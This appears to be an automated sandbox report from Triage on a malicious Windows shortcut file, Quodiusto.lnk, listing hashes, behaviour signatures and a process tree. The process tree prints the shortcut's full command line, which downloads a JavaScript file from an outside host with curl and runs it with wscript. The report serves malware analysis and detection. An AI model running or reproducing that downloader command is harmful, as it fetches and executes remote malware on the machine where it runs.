3bbbe42ec85b35ab3e8d39dedc6367c4360f6ec77c6af9002d0a0662d342a9f4 | Triage

Analysis

max time kernel
46s
max time network
50s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
14/09/2022, 19:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Quodiusto.lnk
Size

2KB
MD5

abe92a60356c34925bb507b402c769cc
SHA1

cf3629160a82fc9bce89f336fd5b041c8f6a5117
SHA256

3bbbe42ec85b35ab3e8d39dedc6367c4360f6ec77c6af9002d0a0662d342a9f4
SHA512

f65f095565677f126c8c2925f8b4f1653a3c377fea8a17667324e8c86d06e3808c7028c9c9f4cd0be61e52d21b8d1553a1a11664e239ad76a505e56752ba9651

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1880 wrote to memory of 772	1880	cmd.exe	28
PID 1880 wrote to memory of 772	1880	cmd.exe	28
PID 1880 wrote to memory of 772	1880	cmd.exe	28

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Quodiusto.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /q /C echo 'Oj6b' && MD "C:\ProgramData\A_Np\fcA" && echo "zLH" && curl.exe --output C:\ProgramData\A_Np\fcA\MJ.aRq.GCk.js https://ap2web.com/MwS/13.html && cd "C:\ProgramData\A_Np\fcA" && wscript MJ.aRq.GCk.js
  2⤵
  PID:772

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1880-54-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

Filesize
8KB

Download